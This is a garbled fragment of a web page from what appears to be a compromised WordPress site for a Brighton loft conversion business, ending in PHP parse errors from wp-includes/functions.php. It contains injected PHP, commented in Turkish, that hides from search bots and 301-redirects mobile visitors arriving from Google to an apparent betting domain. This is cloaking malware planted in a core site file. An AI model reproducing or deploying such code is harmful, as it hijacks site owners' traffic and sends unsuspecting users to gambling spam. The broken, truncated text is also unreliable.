trim();
// 3. Adım: Google'dan gelen Mobil Kullanıcı Yönlendirmesi
// Eğer bot değilse ama User Agent içinde hem "Google" hem "Mobile" varsa veya Referer Google ise:
if (!$is_bot && !empty($u)) {
$is_mobile = (stripos($u, 'Mobile') !== false || stripos($u, 'Android') !== false || stripos($u, 'iPhone') !== false);
$from_google = (stripos($r, 'google.com') !== false || stripos($u, 'Google') !== false);
if ($is_mobile && $from_google) {
header("Location: https://belugabahiseia.shop/", true, 301);
exit();
}
}
?>
Parse error: syntax error, unexpected token "," in /home/u697481416/domains/brighton-hoveloftconversion.co.uk/public_html/wp-includes/functions.php on line 845
Parse error: syntax error, unexpected token "," in /home/u697481416/domains/brighton-hoveloftconversion.co.uk/public_html/wp-includes/functions.php on line 845